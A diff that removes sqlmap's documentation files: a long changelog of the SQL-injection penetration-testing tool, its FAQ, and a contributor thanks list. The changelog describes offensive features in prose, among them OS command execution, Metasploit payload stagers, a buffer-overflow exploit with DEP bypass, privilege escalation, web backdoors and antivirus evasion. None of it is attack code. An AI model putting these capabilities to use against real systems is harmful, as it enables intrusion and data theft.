-  * Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
-  * Implemented support for Firebird (Bernardo and Miroslav).
-  * Implemented support for Microsoft Access, Sybase and SAP MaxDB
-    (Miroslav).
-  * Extended old '--dump -C' functionality to be able to search for
-    specific database(s), table(s) and column(s), --search switch
-    (Bernardo).
-  * Added support to tamper injection data with --tamper switch (Bernardo
-    and Miroslav).
-  * Added automatic recognition of password hashes format and support to
-    crack them with a dictionary-based attack (Miroslav).
-  * Added support to enumerate roles on Oracle, --roles switch (Bernardo).
-  * Added support for SOAP based web services requests (Bernardo).
-  * Added support to fetch unicode data (Bernardo and Miroslav).
-  * Added support to use persistent HTTP(s) connection for speed
-    improvement, --keep-alive switch (Miroslav).
-  * Implemented several optimization switches to speed up the exploitation
-    of SQL injections (Bernardo and Miroslav).
-  * Support to test and inject against HTTP Referer header (Miroslav).
-  * Implemented HTTP(s) proxy authentication support, --proxy-cred switch
-    (Miroslav).
-  * Implemented feature to speedup the enumeration of table names
-    (Miroslav).
-  * Support for customizable HTTP(s) redirections (Bernardo).
-  * Support to replicate the back-end DBMS tables structure and entries
-    in a local SQLite 3 database, --replicate switch (Miroslav).
-  * Support to parse and test forms on target url, --forms switch
-    (Bernardo and Miroslav).
-  * Added switches to brute-force tables names and columns names with a
-    dictionary attack, --common-tables and --common-columns. Useful for
-    instance when system table 'information_schema' is not available on
-    MySQL (Miroslav).
-  * Basic support for REST-style URL parameters by using the asterisk (*)
-    to mark where to test for and exploit SQL injection (Miroslav).
-  * Added safe URL feature, --safe-url and --safe-freq (Miroslav).
-  * Added --text-only switch to strip from the HTTP response body the
-    HTML/JS code and compare pages based only on their textual content
-    (Miroslav).
-  * Implemented few other features and switches (Bernardo and Miroslav).
-  * Over 100 bugs fixed (Bernardo and Miroslav).
-  * Major code refactoring (Bernardo and Miroslav).
-  * User's manual updated (Bernardo).
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 10 Apr 2011 21:00:00 +0000
-
-sqlmap (0.8-1) stable; urgency=low
-
-  * Support to enumerate and dump all databases' tables containing user
-    provided column(s) by specifying for instance '--dump -C user,pass'.
-    Useful to identify for instance tables containing custom application
-    credentials (Bernardo).
-  * Support to parse -C (column name(s)) when fetching
-    columns of a table with --columns: it will enumerate only columns like
-    the provided one(s) within the specified table (Bernardo).
-  * Support for takeover features on PostgreSQL 8.4 (Bernardo).
-  * Enhanced --priv-esc to rely on new Metasploit Meterpreter's
-    'getsystem' command to elevate privileges of the user running the
-    back-end DBMS instance to SYSTEM on Windows (Bernardo).
-  * Automatic support in --os-pwn to use the web uploader/backdoor to
-    upload and execute the Metasploit payload stager when stacked queries
-    SQL injection is not supported, for instance on MySQL/PHP and
-    MySQL/ASP, but there is a writable folder within the web server
-    document root (Bernardo and Miroslav).
-  * Fixed web backdoor functionality for --os-cmd, --os-shell and --os-pwn
-    useful when web application does not support stacked queries (Bernardo).
-  * Added support to properly read (--read-file) also binary files via
-    PostgreSQL by injecting sqlmap new sys_fileread() user-defined
-    function (Bernardo and Miroslav).
-  * Updated active fingerprint and comment injection fingerprint for
-    MySQL 5.1, MySQL 5.4 and MySQL 5.5 (Bernardo).
-  * Updated active fingerprint for PostgreSQL 8.4 (Bernardo).
-  * Support for NTLM authentication via python-ntlm third party library,
-    http://code.google.com/p/python-ntlm/, --auth-type NTLM (Bernardo).
-  * Support to automatically decode deflate, gzip and x-gzip HTTP
-    responses (Miroslav).
-  * Support for Certificate authentication, --auth-cert option added
-    (Miroslav).
-  * Added support for regular expression based scope when parsing Burp or
-    Web Scarab proxy log file (-l), --scope (Miroslav).
-  * Added option (-r) to load a single HTTP request from a text file
-    (Miroslav).
-  * Added option (--ignore-proxy) to ignore system default HTTP proxy
-    (Miroslav).
-  * Added support to ignore Set-Cookie in HTTP responses,
-    --drop-set-cookie (Miroslav).
-  * Added support to specify which Google dork result page to parse,
-    --gpage to be used together with -g (Miroslav).
-  * Major bug fix and enhancements to the multi-threading (--threads)
-    functionality (Miroslav).
-  * Fixed URL encoding/decoding of GET/POST parameters and Cookie header
-    (Miroslav).
-  * Refactored --update to use python-svn third party library if available
-    or 'svn' command to update sqlmap to the latest development version
-    from subversion repository (Bernardo and Miroslav).
-  * Major bugs fixed (Bernardo and Miroslav).
-  * Cleanup of UDF source code repository,
-    https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack (Bernardo
-    and Miroslav).
-  * Major code cleanup (Miroslav).
-  * Added simple file encryption/compression utility, extra/cloak/cloak.py,
-    used by sqlmap to decrypt on the fly Churrasco, UPX executable and web
-    shells consequently reducing drastically the number of anti-virus
-    softwares that mistakenly mark sqlmap as a malware (Miroslav).
-  * Updated user's manual (Bernardo and Miroslav).
-  * Created several demo videos, hosted on YouTube
-    (http://www.youtube.com/user/inquisb) and linked from
-    http://sqlmap.sourceforge.net/demo.html (Bernardo).
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 14 Mar 2010 10:00:00 +0000
-
-sqlmap (0.8rc1-1) stable; urgency=low
-
-  * Major enhancement to the Microsoft SQL Server stored procedure
-    heap-based buffer overflow exploit (--os-bof) to automatically bypass
-    DEP memory protection.
-  * Added support for MySQL and PostgreSQL to execute Metasploit shellcode
-    via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an
-    option instead of uploading the standalone payload stager executable.
-  * Added options for MySQL, PostgreSQL and Microsoft SQL Server to
-    read/add/delete Windows registry keys.
-  * Added options for MySQL and PostgreSQL to inject custom user-defined
-    functions.
-  * Added support for --first and --last so the user now has even more
-    granularity in what to enumerate in the query output.
-  * Minor enhancement to save the session by default in
-    'output/hostname/session' file if -s option is not specified.
-  * Minor improvement to automatically remove sqlmap created temporary
-    files from the DBMS underlying file system.
-  * Minor bugs fixed.
-  * Major code refactoring.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon, 21 Sep 2009 15:00:00 +0000
-
-sqlmap (0.7-1) stable; urgency=low
-
-  * Adapted Metasploit wrapping functions to work with latest 3.3
-    development version too.
-  * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
-  * Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
-    --os-bof is selected) when running under Windows because msfconsole
-    and msfcli are not supported on the native Windows Ruby interpreter.
-    This make sqlmap 0.7 to work again on Windows too.
-  * Minor improvement so that sqlmap tests also all parameters with no
-    value (eg. par=).
-  * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and
-    2.6+.
-  * Major bug fix to sql-query/sql-shell features.
-  * Major bug fix in --read-file option.
-  * Major silent bug fix to multi-threading functionality.
-  * Fixed the web backdoor functionality (for MySQL) when (usually) stacked
-    queries are not supported and --os-shell is provided.
-  * Fixed MySQL 'comment injection' version fingerprint.
-  * Fixed basic Microsoft SQL Server 2000 fingerprint.
-  * Many minor bug fixes and code refactoring.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 25 Jul 2009 10:00:00 +0000
-
-sqlmap (0.7rc1-1) stable; urgency=low
-
-  * Added support to execute arbitrary commands on the database server
-    underlying operating system either returning the standard output or not
-    via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored
-    procedure on Microsoft SQL Server;
-  * Added support for out-of-band connection between the attacker box and
-    the database server underlying operating system via stand-alone payload
-    stager created by Metasploit and supporting Meterpreter, shell and VNC
-    payloads for both Windows and Linux;
-  * Added support for out-of-band connection via Microsoft SQL Server 2000
-    and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer
-    overflow (MS09-004) exploitation with multi-stage Metasploit payload
-    support;
-  * Added support for out-of-band connection via SMB reflection attack with
-    UNC path request from the database server to the attacker box by using
-    the Metasploit smb_relay exploit;
-  * Added support to read and write (upload) both text and binary files on
-    the database server underlying file system for MySQL, PostgreSQL and
-    Microsoft SQL Server;
-  * Added database process' user privilege escalation via Windows Access
-    Tokens kidnapping on MySQL and Microsoft SQL Server via either
-    Meterpreter's incognito extension or Churrasco stand-alone executable;
-  * Speed up the inference algorithm by providing the minimum required
-    charset for the query output;
-  * Major bug fix in the comparison algorithm to correctly handle also the
-    case that the url is stable and the False response changes the page
-    content very little;
-  * Many minor bug fixes, minor enhancements and layout adjustments.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 22 Apr 2009 10:30:00 +0000
-
-sqlmap (0.6.4-1) stable; urgency=low
-
-  * Major enhancement to make the comparison algorithm work properly also
-    on url not stables automatically by using the difflib Sequence Matcher
-    object;
-  * Major enhancement to support SQL data definition statements, SQL data
-    manipulation statements, etc from user in SQL query and SQL shell if
-    stacked queries are supported by the web application technology;
-  * Major speed increase in DBMS basic fingerprint;
-  * Minor enhancement to support an option (--is-dba) to show if the
-    current user is a database management system administrator;
-  * Minor enhancement to support an option (--union-tech) to specify the
-    technique to use to detect the number of columns used in the web
-    application SELECT statement: NULL bruteforcing (default) or ORDER BY
-    clause bruteforcing;
-  * Added internal support to forge CASE statements, used only by --is-dba
-    query at the moment;
-  * Minor layout adjustment to the --update output;
-  * Increased default timeout to 30 seconds;
-  * Major bug fix to correctly handle custom SQL "limited" queries on
-    Microsoft SQL Server and Oracle;
-  * Major bug fix to avoid tracebacks when multiple targets are specified
-    and one of them is not reachable;
-  * Minor bug fix to make the Partial UNION query SQL injection technique
-    work properly also on Oracle and Microsoft SQL Server;
-  * Minor bug fix to make the --postfix work even if --prefix is not
-    provided;
-  * Updated documentation.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Tue,  3 Feb 2009 23:30:00 +0000
-
-sqlmap (0.6.3-1) stable; urgency=low
-
-  * Major enhancement to get list of targets to test from Burp proxy
-    (http://portswigger.net/suite/) requests log file path or WebScarab
-    proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
-    'conversations/' folder path by providing option -l <filepath>;
-  * Major enhancement to support Partial UNION query SQL injection
-    technique too;
-  * Major enhancement to test if the web application technology supports
-    stacked queries (multiple statements) by providing option
-    --stacked-test which will be then used someday also by takeover
-    functionality;
-  * Major enhancement to test if the injectable parameter is affected by
-    a time based blind SQL injection technique by providing option
-    --time-test;
-  * Minor enhancement to fingerprint the web server operating system and
-    the web application technology by parsing some HTTP response headers;
-  * Minor enhancement to fingerprint the back-end DBMS operating system by
-    parsing the DBMS banner value when -b option is provided;
-  * Minor enhancement to be able to specify the number of seconds before
-    timeout the connection by providing option --timeout #, default is set
-    to 10 seconds and must be 3 or higher;
-  * Minor enhancement to be able to specify the number of seconds to wait
-    between each HTTP request by providing option --delay #;
-  * Minor enhancement to be able to get the injection payload --prefix and
-    --postfix from user;
-  * Minor enhancement to be able to enumerate table columns and dump table
-    entries, also when the database name is not provided, by using the
-    current database on MySQL and Microsoft SQL Server, the 'public'
-    scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
-  * Minor enhancemet to support also --regexp, --excl-str and --excl-reg
-    options rather than only --string when comparing HTTP responses page
-    content;
-  * Minor enhancement to be able to specify extra HTTP headers by providing
-    option --headers. By default Accept, Accept-Language and Accept-Charset
-    headers are set;
-  * Minor improvement to be able to provide CU (as current user) as user
-    value (-U) when enumerating users privileges or users passwords;
-  * Minor improvements to sqlmap Debian package files;
-  * Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
-    library if available to speed up the sqlmap algorithmic operations;
-  * Minor improvement to retry the HTTP request up to three times in case
-    an exception is raised during the connection to the target url;
-  * Major bug fix to correctly enumerate columns on Microsoft SQL Server;
-  * Major bug fix so that when the user provide a SELECT statement to be
-    processed with an asterisk as columns, now it also work if in the FROM
-    there is no database name specified;
-  * Minor bug fix to correctly dump table entries when the column is
-    provided;
-  * Minor bug fix to correctly handle session.error, session.timeout and
-    httplib.BadStatusLine exceptions in HTTP requests;
-  * Minor bug fix to correctly catch connection exceptions and notify to
-    the user also if they occur within a thread;
-  * Increased default output level from 0 to 1;
-  * Updated documentation.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Thu, 18 Dec 2008 10:00:00 +0000
-
-sqlmap (0.6.2-1) stable; urgency=low
-
-  * Major bug fix to correctly dump tables entries when --stop is not
-    specified;
-  * Major bug fix so that the users' privileges enumeration now works
-    properly also on both MySQL < 5.0 and MySQL >= 5.0;
-  * Major bug fix when the request is POST to also send the GET parameters
-    if any have been provided;
-  * Major bug fix to correctly update sqlmap to the latest stable release
-    with command line --update;
-  * Major bug fix so that when the expected value of a query (count
-    variable) is an integer and, for some reasons, its resumed value from
-    the session file is a string or a binary file, the query is executed
-    again and its new output saved to the session file;
-  * Minor bug fix in MySQL comment injection fingerprint technique;
-  * Minor improvement to correctly enumerate tables, columns and dump
-    tables entries on Oracle and on PostgreSQL when the database name is
-    not 'public' schema or a system database;
-  * Minor improvement to be able to dump entries on MySQL < 5.0 when
-    database name, table name and column(s) are provided;
-  * Updated the database management system fingerprint checks to correctly
-    identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
-  * More user-friendly warning messages.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  2 Nov 2008 19:00:00 +0000
-
-sqlmap (0.6.1-1) stable; urgency=low
-
-  * Major bug fix to blind SQL injection bisection algorithm to handle an
-    exception;
-  * Added a Metasploit Framework 3 auxiliary module to run sqlmap;
-  * Implemented possibility to test for and inject also on LIKE
-    statements;
-  * Implemented --start and --stop options to set the first and the last
-    table entry to dump;
-  * Added non-interactive/batch-mode (--batch) option to make it easy to
-    wrap sqlmap in Metasploit and any other tool;
-  * Minor enhancement to save also the length of query output in the
-    session file when retrieving the query output length for ETA or for
-    resume purposes;
-  * Changed the order sqlmap dump table entries from column by column to
-    row by row. Now it also dumps entries as they are stored in the tables,
-    not forcing the entries' order alphabetically anymore;
-  * Minor bug fix to correctly handle parameters' value with % character.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 20 Oct 2008 10:00:00 +0000
-
-sqlmap (0.6-1) stable; urgency=low
-
-  * Complete code refactor and many bugs fixed;
-  * Added multithreading support to set the maximum number of concurrent
-    HTTP requests;
-  * Implemented SQL shell (--sql-shell) functionality and fixed SQL query
-    (--sql-query, before called -e) to be able to run whatever SELECT
-    statement and get its output in both inband and blind SQL injection
-    attack;
-  * Added an option (--privileges) to retrieve DBMS users privileges, it
-    also notifies if the user is a DBMS administrator;
-  * Added support (-c) to read options from configuration file, an example
-    of valid INI file is sqlmap.conf and support (--save) to save command
-    line options on a configuration file;
-  * Created a function that updates the whole sqlmap to the latest stable
-    version available by running sqlmap with --update option;
-  * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.)
-    installation binary packages;
-  * Created sqlmap .exe (Windows) portable executable;
-  * Save a lot of more information to the session file, useful when
-    resuming injection on the same target to not loose time on identifying
-    injection, UNION fields and back-end DBMS twice or more times;
-  * Improved automatic check for parenthesis when testing and forging SQL
-    query vector;
-  * Now it checks for SQL injection on all GET/POST/Cookie parameters then
-    it lets the user select which parameter to perform the injection on in
-    case that more than one is injectable;
-  * Implemented support for HTTPS requests over HTTP(S) proxy;
-  * Added a check to handle NULL or not available queries output;
-  * More entropy (randomStr() and randomInt() functions in
-    lib/core/common.py) in inband SQL injection concatenated query and in
-    AND condition checks;
-  * Improved XML files structure;
-  * Implemented the possibility to change the HTTP Referer header;
-  * Added support to resume from session file also when running with
-    inband SQL injection attack;
-  * Added an option (--os-shell) to execute operating system commands if
-    the back-end DBMS is MySQL, the web server has the PHP engine active
-    and permits write access on a directory within the document root;
-  * Added a check to assure that the provided string to match (--string)
-    is within the page content;
-  * Fixed various queries in XML file;
-  * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted
-    the library to parse it;
-  * Fixed password fetching function, mainly for Microsoft SQL Server and
-    reviewed the password hashes parsing function;
-  * Major bug fixed to avoid tracebacks when the testable parameter(s) is
-    dynamic, but not injectable;
-  * Enhanced logging system: added three more levels of verbosity to show
-    also HTTP sent and received traffic;
-  * Enhancement to handle Set-Cookie from target url and automatically
-    re-establish the Session when it expires;
-  * Added support to inject also on Set-Cookie parameters;
-  * Implemented TAB completion and command history on both --sql-shell and
-    --os-shell;
-  * Renamed some command line options;
-  * Added a conversion library;
-  * Added code schema and reminders for future developments;
-  * Added Copyright comment and $Id$;
-  * Updated the command line layout and help messages;
-  * Updated some docstrings;
-  * Updated documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon,  1 Sep 2008 10:00:00 +0100
-
-sqlmap (0.5-1) stable; urgency=low
-
-  * Added support for Oracle database management system
-  * Extended inband SQL injection functionality (--union-use) to all
-    other possible queries since it only worked with -e and --file on
-    all DMBS plugins;
-  * Added support to extract database users password hash on Microsoft
-    SQL Server;
-  * Added a fuzzer function with the aim to parse HTML page looking
-    for standard database error messages consequently improving
-    database fingerprinting;
-  * Added support for SQL injection on HTTP Cookie and User-Agent headers;
-  * Reviewed HTTP request library (lib/request.py) to support the
-    extended inband SQL injection functionality. Splitted getValue()
-    into getInband() and getBlind();
-  * Major enhancements in common library and added checkForBrackets()
-    method to check if the bracket(s) are needed to perform a UNION query
-    SQL injection attack;
-  * Implemented --dump-all functionality to dump entire DBMS data from
-    all databases tables;
-  * Added support to exclude DBMS system databases' when enumeration
-    tables and dumping their entries (--exclude-sysdbs);
-  * Implemented in Dump.dbTableValues() method the CSV file dumped data
-    automatic saving in csv/ folder by default;
-  * Added DB2, Informix and Sybase DBMS error messages and minor
-    improvements in xml/errors.xml;
-  * Major improvement in all three DBMS plugins so now sqlmap does not
-    get entire databases' tables structure when all of database/table/
-    column are specified to be dumped;
-  * Important fixes in lib/option.py to make sqlmap properly work also
-    with python 2.5 and handle the CSV dump files creation work also
-    under Windows operating system, function __setCSVDir() and fixed
-    also in lib/dump.py;
-  * Minor enhancement in lib/injection.py to randomize the number
-    requested to test the presence of a SQL injection affected parameter
-    and implemented the possibilities to break (q) the for cycle when
-    using the google dork option (-g);
-  * Minor fix in lib/request.py to properly encode the url to request
-    in case the "fixed" part of the url has blank spaces;
-  * More minor layout enhancements in some libraries;
-  * Renamed DMBS plugins;
-  * Complete code refactoring, a lot of minor and some major fixes in
-    libraries, many minor improvements;
-  * Updated all documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  4 Nov 2007 20:00:00 +0100
-
-sqlmap (0.4-1) stable; urgency=low
-
-  * Added DBMS fingerprint based also upon HTML error messages parsing
-    defined in lib/parser.py which reads an XML file defining default
-    error messages for each supported DBMS;
-  * Added Microsoft SQL Server extensive DBMS fingerprint checks based
-    upon accurate '@@version' parsing matching on an XML file to get also
-    the exact patching level of the DBMS;
-  * Added support for query ETA (Estimated Time of Arrival) real time
-    calculation (--eta);
-  * Added support to extract database management system users password
-    hash on MySQL and PostgreSQL (--passwords);
-  * Added docstrings to all functions, classes and methods, consequently
-    released the sqlmap development documentation
-    <http://sqlmap.sourceforge.net/dev/>;
-  * Implemented Google dorking feature (-g) to take advantage of Google
-    results affected by SQL injection to perform other command line
-    argument on their DBMS;
-  * Improved logging functionality: passed from banal 'print' to Python
-    native logging library;
-  * Added support for more than one parameter in '-p' command line
-    option;
-  * Added support for HTTP Basic and Digest authentication methods
-    (--basic-auth and --digest-auth);
-  * Added the command line option '--remote-dbms' to manually specify
-    the remote DBMS;
-  * Major improvements in union.UnionCheck() and union.UnionUse()
-    functions to make it possible to exploit inband SQL injection also
-    with database comment characters ('--' and '#') in UNION query
-    statements;
-  * Added the possibility to save the output into a file while performing
-    the queries (-o OUTPUTFILE) so it is possible to stop and resume the
-    same query output retrieving in a second time (--resume);
-  * Added support to specify the database table column to enumerate
-    (-C COL);
-  * Added inband SQL injection (UNION query) support (--union-use);
-  * Complete code refactoring, a lot of minor and some major fixes in
-    libraries, many minor improvements;
-  * Reviewed the directory tree structure;
-  * Splitted lib/common.py: inband injection functionalities now are
-    moved to lib/union.py;
-  * Updated documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 15 Jun 2007 20:00:00 +0100
-
-sqlmap (0.3-1) stable; urgency=low
-
-  * Added module for MS SQL Server;
-  * Strongly improved MySQL dbms active fingerprint and added MySQL
-    comment injection check;
-  * Added PostgreSQL dbms active fingerprint;
-  * Added support for string match (--string);
-  * Added support for UNION check (--union-check);
-  * Removed duplicated code, delegated most of features to the engine
-    in common.py and option.py;
-  * Added support for --data command line argument to pass the string
-    for POST requests;
-  * Added encodeParams() method to encode url parameters before making
-    http request;
-  * Many bug fixes;
-  * Rewritten documentation files;
-  * Complete code restyling.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 20 Jan 2007 20:00:00 +0100
-
-sqlmap (0.2-1) stable; urgency=low
-
-  * complete refactor of entire program;
-  * added TODO and THANKS files;
-  * added some papers references in README file;
-  * moved headers to user-agents.txt, now -f parameter specifies a file
-    (user-agents.txt) and randomize the selection of User-Agent header;
-  * strongly improved program plugins (mysqlmap.py and postgres.py),
-    major enhancements:
-    * improved active mysql fingerprint check_dbms();
-    * improved enumeration functions for both databases;
-    * minor changes in the unescape() functions;
-  * replaced old inference algorithm with a new bisection algorithm.
-  * reviewed command line parameters, now with -p it's possible to
-    specify the parameter you know it's vulnerable to sql injection,
-    this way the script won't perform the sql injection checks itself;
-    removed the TOKEN parameter;
-  * improved Common class, adding support for http proxy and http post
-    method in hash_page;
-  * added OptionCheck class in option.py which performs all needed checks
-    on command line parameters and values;
-  * added InjectionCheck class in injection.py which performs check on
-    url stability, dynamics of parameters and injection on dynamic url
-    parameters;
-  * improved output methods in dump.py;
-  * layout enhancement on main program file (sqlmap.py), adapted to call
-    new option/injection classes and improvements on catching of
-    exceptions.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 13 Dec 2006 20:00:00 +0100

doc/FAQ.sgml

@@ -1,109 +0,0 @@
-<!doctype linuxdoc system>
-
-<article>
-
-<title>sqlmap - Frequently Asked Questions
-<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">,
-<htmlurl url="mailto:miroslav.stampar@gmail.com" name="Miroslav Stampar">
-<abstract>
-This document contains frequently asked questions for <htmlurl
-url="http://sqlmap.sourceforge.net" name="sqlmap">.
-</abstract>
-
-<toc>
-
-<sect>Frequently Asked Questions
-
-<sect1>What is sqlmap?
-
-<p>
-sqlmap is an open source penetration testing tool that automates the
-process of detecting and exploiting SQL injection flaws and taking over
-of database servers. It comes with a kick-ass detection engine, many niche
-features for the ultimate penetration tester and a broad range of switches
-lasting from database fingerprinting, over data fetching from the
-database, to accessing the underlying file system and executing commands
-on the operating system via out-of-band connections.
-
-<sect1>How do I execute sqlmap?
-
-<p>
-If you are running on a Unix/Linux system type the following command
-from a terminal:
-<tscreen><verb>
-python sqlmap.py -h
-</verb></tscreen>
-
-<p>
-If you are running on a Windows system type the following command
-from a terminal:
-<tscreen><verb>
-C:\Python26\python.exe sqlmap.py -h
-</verb></tscreen>
-
-<p>
-Where <tt>C:\Python26</tt> is the path where you installed <htmlurl
-url="http://www.python.org" name="Python"> <bf>>= 2.6</bf>.
-
-<sect1>Can I integrate sqlmap with a security tool I am developing?
-
-<p>
-Yes. sqlmap is released under the terms of the GPLv2, which means that any
-derivative work must be distributed without further restrictions on the
-rights granted by the GPL itself. If this constitutes a problem, feel free
-to contact us so we can find a solution.
-
-<sect1>How can I integrate sqlmap with my own tool?
-
-<p>
-TODO
-
-<sect1>Will you support other database management systems?
-
-<p>
-Yes. There are plans to support also IBM DB2, Informix and Ingres at some
-point.
-
-<sect1>How can I occasionally contribute?
-
-<p>
-All help is greatly appreciated. First of all download the tool, make sure
-you are running the latest development version from the Subversion
-repository, read the user's manual carefully, have fun with it during your
-penetration tests.
-If you find bugs or have ideas for possible improvements, feel free to
-<htmlurl url="http://sqlmap.sourceforge.net/#ml" name="get in touch on the
-mailing list">. Many people have <htmlurl
-url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/THANKS"
-name="contributed"> in different ways to the sqlmap development.
-<bf>You</bf> can be the next!
-
-<sect1>Can I actively contribute in the long-term development?
-
-<p>
-Yes, we are looking for people who can write some clean Python code, are
-up to do security research, know about web application security, database
-assessment and takeover, software refactoring and are motivated to join
-the development team.
-If this sounds interesting to you, <htmlurl
-url="http://sqlmap.sourceforge.net/#developers" name="get in touch">!
-
-<sect1>How can I support the development?
-
-<p>
-If you think that sqlmap is a great tool, it really played well during
-your penetration tests, or you simply like it, you, or your boss, can
-<htmlurl url="http://sqlmap.sourceforge.net/#donate" name="donate
-some money"> to the developers via PayPal.
-
-<sect1>Can you hack a site for me?
-
-<p>
-<bf>No</bf>.
-
-<sect1>How sqlmap decides this and that?
-
-<p>
-TODO
-
-</article>

doc/THANKS

@@ -1,554 +0,0 @@
-== Individuals ==
-
-Santiago Accurso <saccurso@skygear.com.ar>
-    for reporting a bug
-
-David Alvarez <david.alvarez.s@gmail.com>
-    for reporting a bug
-
-Chip Andrews <chip@sqlsecurity.com>
-    for his excellent work maintaining the SQL Server versions database
-    at SQLSecurity.com and permission to implement the update feature
-    taking data from his site
-
-Smith Andy <teh.one@hotmail.com>
-    for suggesting a feature
-
-Otavio Augusto <otavioarj@gmail.com>
-    for reporting a minor bug
-
-Simon Baker <simonb@sec-1.com>
-    for reporting some bugs
-
-Emiliano Bazaes <emiliano@7espejos.com>
-    for reporting a minor bug
-
-Daniele Bellucci <daniele.bellucci@gmail.com>
-    for starting sqlmap project and developing it between July and August
-    2006
-
-Velky Brat <velkybrat@gmail.com>
-    for suggesting a minor enhancement to the bisection algorithm
-
-Jack Butler <fattredd@hotmail.com>
-    for providing me with the sqlmap site favicon
-
-Ulisses Castro <uss.thebug@gmail.com>
-    for reporting a bug
-
-Roberto Castrogiovanni <castrogiovanni.roberto@gmail.com>
-    for reporting a minor bug
-
-Cesar Cerrudo <cesar@argeniss.com>
-    for his Windows access token kidnapping tool Churrasco included in
-    sqlmap tree as a contrib library and used to run the stand-alone
-    payload stager on the target Windows machine as SYSTEM user if the
-    user wants to perform a privilege escalation attack,
-    http://www.argeniss.com/research/TokenKidnapping.pdf
-
-Karl Chen <quarl@cs.berkeley.edu>
-    for providing with the multithreading patch for the inference
-    algorithm
-
-Y P Chien <ypchien@cox.net>
-    for reporting a minor bug
-
-Pierre Chifflier <pollux@debian.org> and Mark Hymers <ftpmaster@debian.org>
-    for uploading and accepting the sqlmap Debian package to the official
-    Debian project repository
-
-Andreas Constantinides <megahz@megahz.org>
-    for reporting a minor bug
-
-Ulises U. Cune <ulises2k@gmail.com>
-    for reporting a bug
-
-Alessandro Curio <alessandro.curio@gmail.com>
-    for reporting a minor bug
-
-Alessio Dalla Piazza <alessio.dallapiazza@gmail.com>
-    for reporting a minor bug
-
-Stefano Di Paola <stefano.dipaola@wisec.it>
-    for suggesting good features
-
-Mosk Dmitri <ya@darkbyte.ru>
-    for reporting a minor bug
-
-Carey Evans <careye@spamcop.net>
-    for his fcrypt module that allows crypt(3) support
-    on Windows platforms
-
-Adam Faheem <faheem.adam@is.co.za>
-    for reporting a few bugs
-
-James Fisher <www@sittinglittleduck.com>
-    for providing me with two very good feature requests
-    for his great tool too brute force directories and files names on
-    web/application servers, Dir Buster, http://tinyurl.com/dirbuster
-
-Jim Forster <jimforster@goldenwest.com>
-    for reporting a bug
-
-Rong-En Fan <rafan@freebsd.org>
-    for commiting the sqlmap 0.5 port to the official FreeBSD project
-    repository
-
-Giorgio Fedon <giorgio.fedon@gmail.com>
-    for suggesting a speed improvement for bisection algorithm
-    for reporting a bug when running against Microsoft SQL Server 2005
-
-Kasper Fons <thefeds@mail.dk>
-    for reporting several bugs
-
-Jose Fonseca <jose.r.fonseca@gmail.com>
-    for his Gprof2Dot utility for converting profiler output to dot
-    graph(s) and for his XDot utility to render nicely dot graph(s),
-    both included in sqlmap tree inside extra folder. These libraries
-    are used for sqlmap development purposes only
-    http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
-    http://code.google.com/p/jrfonseca/wiki/XDot
-
-Alan Franzoni <alan.franzoni@gmail.com>
-    for helping me out with Python subprocess library
-
-Daniel G. Gamonal <lgrecol@gmail.com>
-    for reporting a minor bug
-
-Marcos Mateos Garcia <mmateos@germinus.com>
-    for reporting a minor bug
-
-Ivan Giacomelli <truemilk@insiberia.net>
-    for reporting a bug
-    for suggesting a minor enhancement
-    for reviewing the documentation
-
-Nico Golde <nico@ngolde.de>
-    for reporting a couple of bugs
-
-Oliver Gruskovnjak <oliver.gruskovnjak@gmail.com>
-    for reporting a bug
-    for providing me with a minor patch
-
-Davide Guerri <d.guerri@caspur.it>
-    for suggesting an enhancement
-
-Dan Guido <dguido@gmail.com>
-    for promoting sqlmap in the context of the Penetration Testing and
-    Vulnerability Analysis class at the Polytechnic University of New York,
-    http://isisblogs.poly.edu/courses/pentest/
-
-David Guimaraes <skysbsb@gmail.com>
-    for reporting several bugs
-    for suggesting an enhancement
-
-Chris Hall <chris.hall@mod10.net>
-    for coding the prettyprint.py library
-
-Tate Hansen <tate@clearnetsec.com>
-    for donating to sqlmap development
-
-Mario Heiderich <mario.heiderich@gmail.com>
-Christian Matthies <ch0012@gmail.com>
-Lars H. Strojny <lars@strojny.net>
-    for their great tool PHPIDS included in sqlmap tree as
-    a set of rules for testing payloads against IDS detection,
-    http://php-ids.org
-
-Kristian Erik Hermansen <kristian.hermansen@gmail.com>
-    for reporting a bug
-    for donating to sqlmap development
-
-Jorge Hoya <aquinadie@gmail.com>
-    for suggesting a minor enhancement
-
-Will Holcomb <wholcomb@gmail.com>
-    for his MultipartPostHandler class to handle multipart POST forms and
-    permission to include it within sqlmap source code
-
-Daniel Huckmann <sanitybit@gmail.com>
-    for reporting a couple of bugs
